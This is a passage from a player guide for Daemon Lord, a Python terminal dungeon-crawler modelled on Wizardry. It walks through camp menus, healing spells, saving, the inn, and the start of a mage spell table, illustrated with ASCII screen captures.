^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^| |^^^^^^^^^^^^^\n ^^^^^^^^^^^^#.....#^^^^#....#^^^^^########^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^| * You encountered friendly orcs. |^^^^^^^^^^^^^\n ^^^^^^^^^| Leave? (y/n) > |^^^^^^^^^^^^^\n\nOf course, you will get no e.p. or gold if you chose to walk away.\n\n 4 dia N-THI 10 7 OK ^* *** encounter *** ^\n 5 emily G-PRI 10 13 OK ^ Each survivor gets 0 e.p. ^\n 6 faun G-MAG 10 7 OK ^ Each survivor gets 0 gold. ^\n\n\n<a id=\"org8827640\"></a>\n\n### Get ouf of the Dungeon\n\n daemon lord - dl - [maze] floor:?? (???/???) #####.#^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#.......#^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#......+#######^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.........#......#,.....#^^^^^^^^^^#########\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.#########.####......#^^^^^^^^^^#........\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^#.......#......#^^^^^^^^^^#........\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^#.......#......#^^^^^^^^^^#........\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^#.........++.###^^^^^^^^^^#........\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#..@..#^^#.......####.#^^^^^^^^###########.#\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^#.......#^^#.#^^^^^^^^#...###,....#\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^#########^^#.#^^^^^^^^#............\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.#^^^^^^^^^^^^^^^#.#^^^^^^^^#...###.....#\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^###.###^^^^^^^^^^^^^#.#^^^^^^^^#...#^#######\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^######^^^#.#^^^^^^#####.#####^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^#....#^^^#.#^^^^^^#....,....#^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....#^^^^#....#####.########.........#^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#.....######....+.+.+.+......+.........#####\n # name class ac hp status .* north .\n 1 ab G-FIG 4 13 OK #* north #\n 2 ben G-FIG 4 7 OK ^* east ^\n 3 cam G-FIG 4 5 OK ^* east ^\n 4 dia N-THI 10 7 OK ^* north ^\n 5 emily G-PRI 10 13 OK ^* north ^\n 6 faun G-MAG 10 7 OK ^ Exit from dungeon? (y/n) > ^\n\nHaving walked around a lot on this floor, and now the mage's MP is exhausted and some are injured. Let's get back to the outside world. `<` is the upstairs to outside. Answer `y` to the question: \"Exit from dungeon? (y/n)\"\n\n daemon lord - dl - [edge_of_town] floor:?? (???/???) \n \n \n \n \t | * *** Edge of Town *** | \n \t | m)aze | \n \t | t)raining grounds | \n \t | c)astle | \n \t | S)ave and quit game | \n \t | R)esume from saved data | \n \t | Command? > | \n \t | | \n \t | | \n \t | | \n \n \n \n # name class ac hp status * east \n 1 ab G-FIG 4 13 OK * north \n 2 ben G-FIG 4 7 OK * north \n 3 cam G-FIG 4 5 OK * south \n 4 dia N-THI 10 7 OK * west \n 5 emily G-PRI 10 13 OK * west \n 6 faun G-MAG 10 7 OK Exit from dungeon? (y/n) > y \n\nThe party is back at Edge of Town. It should take a while to get used to the brightness but they are safe again!\n\n\n<a id=\"orgf859d65\"></a>\n\n### A new dungeon!\n\n&#x2026; but wait, you should have healed injuries before geting out! No worries. You can go back to the dungeon with `m)aze` again. Let's go back.\n\n daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^.@.^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^* east ^\n 1 ab G-FIG 4 13 OK ^* north ^\n 2 ben G-FIG 4 7 OK ^* north ^\n 3 cam G-FIG 4 5 OK ^* south ^\n 4 dia N-THI 10 7 OK ^* west ^\n 5 emily G-PRI 10 13 OK ^* west ^\n 6 faun G-MAG 10 7 OK ^ Exit from dungeon? (y/n) > y ^\n\nWhat? We can only see 3x3 tiles around the party. Where has the map data gone? Actually, they are in a different dungeon map. Due to some magical power, dungeon maps are regenerated every time the party comes to the dungeon. Let's walk around a little to confirm the theory.\n\n daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^##+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^##+.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...@#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^..<.#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nSee the map is different this time?\n\n\n<a id=\"org3bdba13\"></a>\n\n### Camp\n\nAnyway, type `c` key for camping. The camp menu opens.\n\n daemon lord - dl - [camp] floor: 1 ( 1/ 1) <identify> <light> ^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^| * *** Camp *** |^^^^^^^^^^^^\n ^^^^^^^^^^| i)nspect |^^^^^^^^^^^^\n ^^^^^^^^^^| r)eorder party |^^^^^^^^^^^^\n ^^^^^^^^^^| h)eal all members |^^^^^^^^^^^^\n ^^^^^^^^^^| p)rep for adventure |^^^^^^^^^^^^\n ^^^^^^^^^^| S)ave and quit game |^^^^^^^^^^^^\n ^^^^^^^^^^| l)eave |^^^^^^^^^^^^\n ^^^^^^^^^^| Command? > |^^^^^^^^^^^^\n\nAt camp, you can `i)nspect` characters, `r)eorder party`, `h)eal all members`, `p)rep for adventure` or `S)ave and quit game` . Choose `i)nspect` for spells.\n\n daemon lord - dl - [camp] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^| ab L 1 g-fig dwarf |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| strength 18 gold 21 lvl 1 |^^^^^^\n ^^^^^^^^^^| i.q. 7 e.p. 183 rip 0 |^^^^^^\n ^^^^^^^^^^| piety 10 next 1000 a.c. 4 |^^^^^^\n ^^^^^^^^^^| vitality 13 marks 2 |^^^^^^\n ^^^^^^^^^^| agility 11 h.p. 13/ 13 |^^^^^^\n ^^^^^^^^^^| luck 8 status OK |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| mage 0/0/0/0/0/0/0 priest 0/0/0/0/0/0/0/ |^^^^^^\n ^^^^^^^^^^| 1) *long sword 2) *chain mail |^^^^^^\n ^^^^^^^^^^| 3) *large shield 4) |^^^^^^\n ^^^^^^^^^^| 5) 6) |^^^^^^\n ^^^^^^^^^^| 7) 8) |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| i)tems s)pells jk)change member l)leave > |^^^^^^\n # name | | ^\n 1 ab G-FIG 4 13 OK ^* south ^\n 2 ben G-FIG 4 7 OK ^* *** encounter *** ^\n 3 cam G-FIG 4 5 OK ^ Each survivor gets 0 e.p. ^\n 4 dia N-THI 10 7 OK ^ Each survivor gets 0 gold. ^\n 5 emily G-PRI 10 13 OK ^* south ^\n 6 faun G-MAG 10 7 OK ^* south ^\n\nIt shows the info of the front member Ab. You can change the member shown with `j, k` keys.\n\n ^^^^^^^^^^| emily L 1 g-pri gnome |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| strength 7 gold 21 lvl 1 |^^^^^^\n ^^^^^^^^^^| i.q. 7 e.p. 183 rip 0 |^^^^^^\n ^^^^^^^^^^| piety 18 next 1050 a.c. 10 |^^^^^^\n ^^^^^^^^^^| vitality 13 marks 0 |^^^^^^\n ^^^^^^^^^^| agility 14 h.p. 13/ 13 |^^^^^^\n ^^^^^^^^^^| luck 7 status OK |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| mage 0/0/0/0/0/0/0 priest 2/0/0/0/0/0/0/ |^^^^^^\n ^^^^^^^^^^| 1) *sling 2) |^^^^^^\n ^^^^^^^^^^| 3) 4) |^^^^^^\n ^^^^^^^^^^| 5) 6) |^^^^^^\n ^^^^^^^^^^| 7) 8) |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| i)tems s)pells jk)change member l)leave > |^^^^^^\n\nEmily is a priest and can cast healing spells. Type `s)pells` > `c)ast spell` and type \"jiai\" which heals HP of a member.\n\n ^^^^^^^^^^| emily L 1 g-pri gnome |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| strength 7 gold 21 lvl 1 |^^^^^^\n ^^^^^^^^^^| | * Spell memu: | 0 |^^^^^^\n ^^^^^^^^^^| | c)ast spell v)iew list l)eave > c | 10 |^^^^^^\n ^^^^^^^^^^| | * What spell to cast? | |^^^^^^\n ^^^^^^^^^^| | > jiai | |^^^^^^\n ^^^^^^^^^^| | Who? - # or l)eave > 2 | |^^^^^^\n ^^^^^^^^^^| | emily started casting jiai | |^^^^^^\n ^^^^^^^^^^| | ben's HP was fully restored. |0/ |^^^^^^\n ^^^^^^^^^^| | * Spell memu: | |^^^^^^\n ^^^^^^^^^^| | c)ast spell v)iew list l)eave > | |^^^^^^\n\nLooks like, Ben's HP is fully restored. Do the same for Cam.\n\n ^^^^^^^^^^| | ben's HP was fully restored. | |^^^^^^\n ^^^^^^^^^^| | * Spell memu: | |^^^^^^\n ^^^^^^^^^^| | c)ast spell v)iew list l)eave > c | |^^^^^^\n ^^^^^^^^^^| | * What spell to cast? | |^^^^^^\n ^^^^^^^^^^| | > jiai |0/ |^^^^^^\n ^^^^^^^^^^| | Who? - # or l)eave > 3 | |^^^^^^\n ^^^^^^^^^^| | emily started casting jiai | |^^^^^^\n ^^^^^^^^^^| | cam's HP was fully restored. | |^^^^^^\n\nGreat!\n\n\n<a id=\"org70c73a4\"></a>\n\n### Heal all members\n\nBefore you get out of the dungeon, you usually heal (ie, recover HP) all party members. And this could be a little hassle over time.\n\n`h)eal all members` at camp might be of little help here. If you choose the option, the program automatically casts heal spells on party members until either everyone gets full HP or MPs are exhausted.\n\n daemon lord - dl - [camp] floor: 6 ( 63/ 21) <identify> <light> #####.......+.^^^^^\n ^^^^^^^^^^| * *** Camp *** |##...##^^^^^\n ^^^^^^^^^^| i)nspect |#######^^^^^\n ^^^^^^^^^^| r)eorder party |#^^^^^^^^^^^\n ^^^^^^^^^^| h)eal all members |#^^^^^^^^^^^\n ^^^^^^^^^^| S)ave and quit game |#^^^^^^^^^^^\n ^^^^^^^^^^| l)eave |#^^^^^^^^^^^\n ^^^^^^^^^^| Command? > h |##^^^^^^^^^^\n ^^^^^^^^^^| * ed casted zenjiai |##^^^^^^^^^^\n ^^^^^^^^^^| 4 HP was restored to andy. |##^^^^^^^^^^\n ^^^^^^^^^^| 5 HP was restored to bean. |########^^^^\n ^^^^^^^^^^| 7 HP was restored to cammy. |########^^^^\n ^^^^^^^^^^| dexie's HP was fully restored. |......##^^^^\n ^^^^^^^^^^| 5 HP was restored to ed. |#####.##^^^^\n ^^^^^^^^^^| fun's HP was fully restored. |#####.##^^^^\n\nNote that this option doesn't cure status anomallies such as paralyzed or even ashed. Also, the algorithm is not very smart.\n\n\n<a id=\"orge4f1380\"></a>\n\n### Prep for adventure\n\nThis is also an automatic-spell-cast option. When you just go into the dungeon, you'll need some preparation. Namely, casting 'hogo', 'shikibetsu', 'gps' and 'hikarinotama' and these might be a little hassle in the long run. `p)rep for adventure` option automatically casts these spells. That is, if they can.\n\n daemon lord - dl - [camp] floor: 1 ( 1/ 1) <identify> <light> ^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^| * *** Camp *** |^^^^^^^^^^^^\n ^^^^^^^^^^| i)nspect |^^^^^^^^^^^^\n ^^^^^^^^^^| r)eorder party |^^^^^^^^^^^^\n ^^^^^^^^^^| h)eal all members |^^^^^^^^^^^^\n ^^^^^^^^^^| p)rep for adventure |^^^^^^^^^^^^\n ^^^^^^^^^^| S)ave and quit game |^^^^^^^^^^^^\n ^^^^^^^^^^| l)eave |^^^^^^^^^^^^\n ^^^^^^^^^^| Command? > p |^^^^^^^^^^^^\n ^^^^^^^^^^| * ed casted hogo |^^^^^^^^^^^^\n ^^^^^^^^^^| * ed casted shikibetsu |^^^^^^^^^^^^\n ^^^^^^^^^^| * fun casted gps |^^^^^^^^^^^^\n ^^^^^^^^^^| * ed casted hikarinotama |^^^^^^^^^^^^\n\n\n<a id=\"orgdeabb28\"></a>\n\n### Save and Resume from camp\n\nNow, try to save and resume in the dungeon. From the camp menu, choose `S)ave and quit game` .\n\n ^^^^^^^^^^| * *** Camp *** |^^^^^^\n ^^^^^^^^^^| i)nspect |^^^^^^\n ^^^^^^^^^^| r)eorder party |^^^^^^\n ^^^^^^^^^^| S)ave and quit game |^^^^^^\n ^^^^^^^^^^| l)eave |^^^^^^\n ^^^^^^^^^^| Command? > S |^^^^^^\n ^^^^^^^^^^| * Thank you for playing. |^^^^^^\n ^^^^^^^^^^| * See you again soon. |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n\nAnd run the python script.\n\n $ python dl.py\n\nChoose `e)dge of town` > `R)esume from saved data`\n\n | * *** Edge of Town *** | \n | m)aze | \n | t)raining grounds | \n | c)astle | \n | S)ave and quit game | \n | R)esume from saved data | \n | Command? > | \n\nAnd, you are in the dungeon again.\n\n daemon lord - dl - [maze] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^##+###^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^##+.##^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^...@#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^..<.#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^....#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n # name class ac hp status ^ ^\n 1 ab G-FIG 4 13 OK ^ ^\n 2 ben G-FIG 4 12 OK ^ ^\n 3 cam G-FIG 4 10 OK ^ ^\n 4 dia N-THI 10 7 OK ^ ^\n 5 emily G-PRI 10 13 OK ^ ^\n 6 faun G-MAG 10 7 OK ^ ^\n\nLet's exit from the dungeon and head to Edge of Town > Castle > Lakehouse Inn for some rest.\n\n\n<a id=\"orged946f6\"></a>\n\n## Castle\n\n\n<a id=\"org78054aa\"></a>\n\n### The Lakehouse Inn\n\n | * *** Castle *** | \n | h)awthorne tavern | \n | t)rader jay's | \n | i)lakehouse inn | \n | m)oss general hospital | \n | e)dge of town | \n | Command? > | \n\nBack at Castle, type `i` for Lakehouse Inn.\n\n | * *** The Lakehouse Inn *** | \n | Welcome. You must be very tired. | \n | You have 232 gold in total. | \n | c)ots 12 gold | \n | s)tandard rooms 120 gold | \n | d)elux rooms 300 gold | \n | v)lake view suites 1200 gold | \n | p)residential suites 3000 gold | \n | or l)eave | \n | Which rooms to stay today? > | \n\nDelux room sounds good, but as we have only 232 gold, let's choose `c)ots` tonight. Maybe we can stay in standard rooms tomorrow.\n\n | Which rooms to stay today? > c | \n | * Today's dinner is cabbage soup. | \n | * ab went to bed... | \n | * ben went to bed... | \n | * cam went to bed... | \n | * dia went to bed... | \n | * emily went to bed... | \n | * faun went to bed... | \n\nMagic points are fully restored regardless of the room they choose. HPs being restored depend on the room they stay. More comfortable (and thus expensive) rooms will heal them better. Dinner is better in those rooms as well.\n\nIf their e.p. reach the next level, their level will go up while they are asleep at the inn.\n\nIn DL, age doesn't matter. They can stay at the inn as long as they wish without getting old. All the party members stay at the same room type.\n\n\n<a id=\"org00dea26\"></a>\n\n# Spells\n\n\n<a id=\"org37d2ec2\"></a>\n\n## Overview\n\nAs in Wizardry, spells in DL are divided into two categories: mage spells and priest spells. Very roughly speaking, mage spells are for battles with monsters and priest spells are to heal and cure.\n\nThere are magic points (MPs) for each category and spell level. You can check their remaining MPs in the character inspection window.\n\n ^^^^^^^^^^| luck 11 status OK |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| mage 2/0/0/0/0/0/0 priest 0/0/0/0/0/0/0/ |^^^^^^\n ^^^^^^^^^^| 1) 2) |^^^^^^\n ^^^^^^^^^^| 3) 4) |^^^^^^\n\nIn this example, she has 2 MPs remaining for level 1 mage spells. She will acquire more MPs as her level goes up.\n\nThe maximum MPs for each spell level is 9. A high level mage/priest will have `9/9/9/9/9/9/9` MPs.\n\n\n<a id=\"org31faaf3\"></a>\n\n## Usage\n\nSpells can be used only in the dungeon. More specifically, during a battle or while they are camping. The only exception is \"kantei\" which can be used for identifying a chest trap.\n\nSome spells such as mage's \"shunmin\" or \"taika\" can be used only in battles. Some other spells such as mage's \"gps\" or \"tsubasa\" are only available while they are camping.\n\nTo use spells from the camp menu, first `i)nspect` a character who would like to cast a spell. To change characters in the inspect menu, use `j, k` keys until it shows the member to cast the spell. Then, type `s)pells` > `c)ast spell` > enter the spell name (> choose target member).\n\n daemon lord - dl - [camp] floor:?? (???/???) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n ^^^^^^^^^^| faun L 1 g-mag elf |^^^^^^\n ^^^^^^^^^^| |^^^^^^\n ^^^^^^^^^^| strength 7 gold 100 lvl 1 |^^^^^^\n ^^^^^^^^^^| | * Spell memu: | 0 |^^^^^^\n ^^^^^^^^^^| | c)ast spell v)iew list l)eave > c | 10 |^^^^^^\n ^^^^^^^^^^| | * What spell to cast? | |^^^^^^\n ^^^^^^^^^^| | > gps | |^^^^^^\n ^^^^^^^^^^| | | |^^^^^^\n ^^^^^^^^^^| | | |^^^^^^\n ^^^^^^^^^^| | |0/ |^^^^^^\n ^^^^^^^^^^| | | |^^^^^^\n ^^^^^^^^^^| | | |^^^^^^\n ^^^^^^^^^^| | | |^^^^^^\n ^^^^^^^^^^| | | |^^^^^^\n ^^^^^^^^^^| | | |^^^^^^\n ^^^^^^^^^^| i)tems s)pells jk)change member l)leave > s |^^^^^^\n\n\n<a id=\"org502fc72\"></a>\n\n## Mage Spells\n\nOne of the most useful spells will be newly introduced \"tsubasa\". This spell can take the party to the upstairs of a known depth floor for the caster. It can be used to get out of the dungeon (ie, choose depth=1) or to start an adventure from the deepest floor they experienced.\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-right\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-right\">lv</th>\n<th scope=\"col\" class=\"org-left\">name</th>\n<th scope=\"col\" class=\"org-left\">wiz (FYI)</th>\n<th scope=\"col\" class=\"org-left\">description</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">onibi</td>\n<td class=\"org-left\">halito</td>\n<td class=\"org-left\">Fireball to hit a monster for 1-8 damage. 鬼火</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">tate</td>\n<td class=\"org-left\">mogref</td>\n<td class=\"org-left\">Reduce the caster's AC by 2. 盾</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">shunmin</td>\n<td class=\"org-left\">katino</td>\n<td class=\"org-left\">Put one enemy group to asleep. 春眠</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">gps</td>\n<td class=\"org-left\">(dumapic)</td>\n<td class=\"org-left\">Locate the precise position in the dungeon</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">kurayami</td>\n<td class=\"org-left\">dilto</td>\n<td class=\"org-left\">Increase AC by 2 for an enemy group. 暗闇</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">tomei</td>\n<td class=\"org-left\">sopic</td>\n<td class=\"org-left\">Reduce the caster's AC by 4. 透明</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">tsubasa</td>\n<td class=\"org-left\">(malor)</td>\n<td class=\"org-left\">Teleport to a known floor. 翼</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">taika</td>\n<td class=\"org-left\">mahalito</td>\n<td class=\"org-left\">Wall of fire to hit a group of enemies for 4-24 damage. 大火</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">kamaitachi</td>\n<td class=\"org-left\">molito</td>\n<td class=\"org-left\">Sharp wind to inflict 3-18 damage to an enemy group. 鎌鼬</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">4</td>\n<td class=\"org-left\">kanashibari</td>\n<td class=\"org-left\">morlis</td>\n<td class=\"org-left\">Increase AC by 4 for an enemy group. 金縛</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">4</td>\n<td class=\"org-left\">toketsu</td>\n<td class=\"org-left\">dalto</td>\n<td class=\"org-left\">Blizzard to inflict 6-36 damage to an enemy group. 凍結</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">4</td>\n<td class=\"org-left\">gouka</td>\n<td class=\"org-left\">lahalito</td>\n<td class=\"org-left\">Big fire to inflict 6-36 damage to an enemy group. 業火</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">5</td>\n<td class=\"org-left\">kyofu</td>\n<td class=\"org-left\">mamorlis</td>\n<td class=\"org-left\">Increase AC by 4 for all enemy groups. 恐怖</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">5</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">makanito</td>\n<td class=\"org-left\">Eliminate all enemies below Lvl 8. 殲滅</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">5</td>\n<td class=\"org-left\">zettaireido</td>\n<td class=\"org-left\">madalto</td>\n<td class=\"org-left\">Abs. zero to cause 8-64 damage to an enemy group. 絶対零度</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">6</td>\n<td class=\"org-left\">shinoroi</td>\n<td class=\"org-left\">lakanito</td>\n<td class=\"org-left\">Kill all air-breathing enemies in a group. 死呪</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">6</td>\n<td class=\"org-left\">butsumetsu</td>\n<td class=\"org-left\">zilwan</td>\n<td class=\"org-left\">Buddha power to inflict 10-2000 damage to an undead. 仏滅</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">6</td>\n<td 